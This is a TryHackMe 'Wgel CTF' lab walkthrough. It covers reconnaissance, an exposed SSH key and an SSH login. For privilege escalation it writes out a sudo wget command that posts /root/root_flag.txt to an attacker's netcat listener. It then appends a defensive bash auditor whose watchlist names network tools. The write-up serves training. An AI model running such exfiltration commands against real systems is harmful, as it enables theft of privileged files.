[EN] TryHackMe Wgel CTF Writeup

PwnLab.Me

Written by Çağrı Ali Ceylan.



Hello everyone, in this article we will be solving the room named Wgel CTF on TryHackMe.

Let’s Start!

First we perform an aggressive nmap scan. nmap is an information-gathering tool that we can use to actively collect information about the network.

nmap -A 10.10.213.167

We have 2 open ports: port 80 and port 22. A website is served on port 80, and the SSH service runs on port 22. We will start with the web server, as it is open to everyone, and use the tool named gobuster to search for directories.


We found one directory, sitemap. There is not much to find in it directly, so we run a second directory scan inside the sitemap directory.


And yes! We found an SSH key.


We can log in with this key, but we need a username. When we look at the source code of the site, we see a comment like this:

<!-- Jessie don’t forget to udate the webiste -->

Based on this comment, we understand that the user’s name is “Jessie”, so we will now connect over SSH. Before connecting, we need to restrict the permissions on the id_rsa file, because the ssh client refuses to use a private key that other users can read. We can define it as follows.


Let’s connect over SSH now.


And yes we are in!


When we look through the directories, we see that the user flag is in the Documents directory. We can use cat or less to read it. Let’s look at the flag.

cd Documents

cat user_flag.txt

less user_flag.txt (alternative)

Now we need to escalate our privileges, so we first check which commands we are allowed to run with administrator privileges. We can use the following command.

sudo -l

When we look at the output of the command, we see that we can run /usr/bin/wget as administrator without a password, and we can exploit that. A detailed reference on abusing this is here: https://www.hackingarticles.in/linux-for-pentester-wget-privilege-escalation/. Now let’s exploit our machine by entering the command given there.



First, we need to start a netcat listener on our own computer.




Now let’s enter the following command on the target machine. Replace the IP address in the command with the one TryHackMe assigned to you.

sudo /usr/bin/wget --post-file=/root/root_flag.txt 10.9.30.197:5050


Since sudo allows us to run wget without a password, the machine did not ask for one while giving us administrator permission. Has anything arrived in the terminal tab where we are listening with netcat? Let’s have a look. Yes, it has! The value of our administrator flag is in front of us, so let’s enter the flag and finish the machine.


You can follow our website for more content!

https://pwnlab.me/category/walkthrough/
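
From the defender's side, the weakness used in the last step is the passwordless sudo rule for /usr/bin/wget. As an added example (not part of the original writeup), this bash function reads `sudo -l` output and flags NOPASSWD rules for binaries on a watchlist; the watchlist, the function names and the sample output are assumptions made for illustration.

```bash
#!/usr/bin/env bash
# Added example (not from the writeup): flag passwordless sudo rules for
# binaries that can send local files elsewhere, like the wget rule above.
# WATCHLIST is an assumed, illustrative list; extend it to match local policy.
WATCHLIST="wget curl scp rsync nc ftp"
# Reads `sudo -l` output on stdin; prints one RISK line per flagged command.
audit_sudo_l() {
  awk -v watch="$WATCHLIST" '
    BEGIN { n = split(watch, w, " "); for (i = 1; i <= n; i++) risky[w[i]] = 1 }
    /^User .* may run/ { user = $2 }
    # Rule lines look like:  (root) NOPASSWD: /usr/bin/wget, /usr/bin/apt
    /^[ \t]*\(/ {
      line = $0; sub(/^[ \t]*/, "", line)
      runas = substr(line, 1, index(line, ")"))
      rest  = substr(line, index(line, ")") + 1)
      nopw = 0
      m = split(rest, cmds, ",")
      for (i = 1; i <= m; i++) {
        c = cmds[i]
        # Tags (NOPASSWD:, PASSWD:, SETENV:) prefix a command and carry over
        # to the commands after it until another tag overrides them.
        while (match(c, /^[ \t]*[A-Z_]+:[ \t]*/)) {
          tag = substr(c, RSTART, RLENGTH); gsub(/[ \t:]/, "", tag)
          if (tag == "NOPASSWD") nopw = 1
          if (tag == "PASSWD")   nopw = 0
          c = substr(c, RSTART + RLENGTH)
        }
        gsub(/^[ \t]+|[ \t]+$/, "", c)
        split(c, parts, " ")           # parts[1] = binary path, rest = args
        k = split(parts[1], seg, "/")  # seg[k]   = basename of the binary
        if (nopw && (c == "ALL" || (seg[k] in risky)))
          printf "RISK: %s may run %s as %s without a password\n", user, c, runas
      }
    }
  '
}
# Constructed sample of `sudo -l` output (hostname and Defaults are made up).
sample_sudo_l() {
  cat <<'EOF'
Matching Defaults entries for jessie on examplehost:
    env_reset, mail_badpass

User jessie may run the following commands on examplehost:
    (ALL : ALL) ALL
    (root) NOPASSWD: /usr/bin/wget
EOF
}
sample_sudo_l | audit_sudo_l   # on a real host: sudo -l | audit_sudo_l
```

The `(ALL : ALL) ALL` rule is not flagged because it still requires the user's password; only the passwordless wget rule is reported.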
 